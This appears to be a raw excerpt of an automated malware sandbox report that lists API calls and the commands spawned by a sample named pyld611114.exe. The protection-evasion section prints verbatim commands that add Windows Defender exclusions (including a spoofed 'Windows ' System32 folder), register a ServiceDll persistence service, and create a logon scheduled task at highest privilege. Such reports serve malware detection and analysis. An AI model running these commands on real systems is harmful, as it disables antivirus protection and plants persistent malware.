Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows \System32\printui.exeCode function: 27_2_00007FF63F421880 SetUnhandledExceptionFilter,27_2_00007FF63F421880
Source: C:\Windows \System32\printui.exeCode function: 27_2_00007FF63F421B5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,27_2_00007FF63F421B5C
Source: C:\Windows\System32\svchost.exeCode function: 42_2_64947650 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_64947650
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6828C940 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,42_2_6828C940
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFD94729508 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FFD94729508
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFD9471B3B0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFD9471B3B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA368EE70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFDA368EE70
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA368FA50 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FFDA368FA50
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36F7178 SetUnhandledExceptionFilter,42_2_00007FFDA36F7178
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36F6F94 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_00007FFDA36F6F94
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36F6630 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_00007FFDA36F6630
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA21800 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,45_2_00007FF71FA21800
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA286CC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_00007FF71FA286CC
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA21C94 SetUnhandledExceptionFilter,45_2_00007FF71FA21C94
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA21AB4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_00007FF71FA21AB4
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3796224 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,45_2_00007FFDA3796224
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA37957A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,45_2_00007FFDA37957A0
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCACE30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,76_2_00007FF60CCACE30
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCBA8A8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,76_2_00007FF60CCBA8A8
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCAD1CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,76_2_00007FF60CCAD1CC
Source: C:\Windows\System32\crypti.exeCode function: 76_2_00007FF60CCAD3AC SetUnhandledExceptionFilter,76_2_00007FF60CCAD3AC
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EEA8A8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,83_2_00007FF7D6EEA8A8
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EDD3AC SetUnhandledExceptionFilter,83_2_00007FF7D6EDD3AC
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EDD1CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,83_2_00007FF7D6EDD1CC
Source: C:\Windows\System32\crypti.exeCode function: 83_2_00007FF7D6EDCE30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,83_2_00007FF7D6EDCE30

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\pyld611114.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Users\user\Desktop\pyld611114.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\usvcinsta64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"Jump to behavior
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\usvcinsta64.exe "C:\Windows\System32\usvcinsta64.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreakJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\printui.exe "C:\Windows \System32\printui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKLM\SYSTEM\CurrentControlSet\services\x816796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x816796.dat" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start x816796
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\console_zero.exe "C:\Windows\System32\console_zero.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout /t 10 /nobreak
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'E:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'F:\'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\crypti.exe "c:\windows\system32\crypti.exe"
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x816796 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x816796\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x816796.dat" /f && sc start x816796
Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x816796 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x816796\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x816796.dat" /f && sc start x816796
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FF71FA39690 cpuid 45_2_00007FF71FA39690
Source: C:\Windows\System32\svchost.exeCode function: strtoul,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,strncmp,42_2_682864E0
Source: C:\Windows\System32\svchost.exeCode function: strchr,pthread_mutex_lock,strcmp,strncpy,EnumSystemLocalesA,pthread_mutex_unlock,strcpy,pthread_mutex_unlock,abort,42_2_68287D70
Source: C:\Windows\System32\svchost.exeCode function: getenv,GetLocaleInfoA,42_2_68286680
Source: C:\Windows\System32\svchost.exeCode function: memset,MultiByteToWideChar,GetLocaleInfoEx,malloc,malloc,strspn,42_2_00007FFDA36F4B70
Source: C:\Windows\System32\console_zero.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,45_2_00007FF71FA2F978
Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesW,45_2_00007FF71FA370F8
Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,45_2_00007FF71FA377F4
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoW,45_2_00007FF71FA376B0
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoEx,GetLocaleInfoW,45_2_00007FF71FA2F610
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,45_2_00007FF71FA375FC
Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesEx,45_2_00007FF71FA2F540
Source: C:\Windows\System32\console_zero.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,45_2_00007FF71FA36D94
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoW,45_2_00007FF71FA374A4
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoEx,FormatMessageA,45_2_00007FF71FA1FBA8
Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesW,45_2_00007FF71FA2F29C
Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,45_2_00007FF71FA37260
Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesW,45_2_00007FF71FA371C8
Source: C:\Windows\System32\crypti.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,76_2_00007FF60CCC869C
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,76_2_00007FF60CCD0D74
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesW,76_2_00007FF60CCC7FC0
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoW,76_2_00007FF60CCD0FB8
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,76_2_00007FF60CCD1110
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesW,76_2_00007FF60CCD0C0C
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesW,76_2_00007FF60CCD0CDC
Source: C:\Windows\System32\crypti.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,76_2_00007FF60CCD08A8
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoW,76_2_00007FF60CCD11C4
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,76_2_00007FF60CCD1308
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoEx,GetLocaleInfoW,76_2_00007FF60CCC8334
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesEx,76_2_00007FF60CCC8264
Source: C:\Windows\System32\crypti.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,83_2_00007FF7D6EF869C
Source: C:\Windows\System32\crypti.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,83_2_00007FF7D6F008A8
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoEx,GetLocaleInfoW,83_2_00007FF7D6EF8334
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoW,83_2_00007FF7D6F011C4
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,83_2_00007FF7D6F01308
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesEx,83_2_00007FF7D6EF8264
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesW,83_2_00007FF7D6EF7FC0
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoW,83_2_00007FF7D6F00FB8
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,83_2_00007FF7D6F01110
Source: C:\Windows\System32\crypti.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,83_2_00007FF7D6F00D74
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesW,83_2_00007FF7D6F00C0C
Source: C:\Windows\System32\crypti.exeCode function: EnumSystemLocalesW,83_2_00007FF7D6F00CDC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
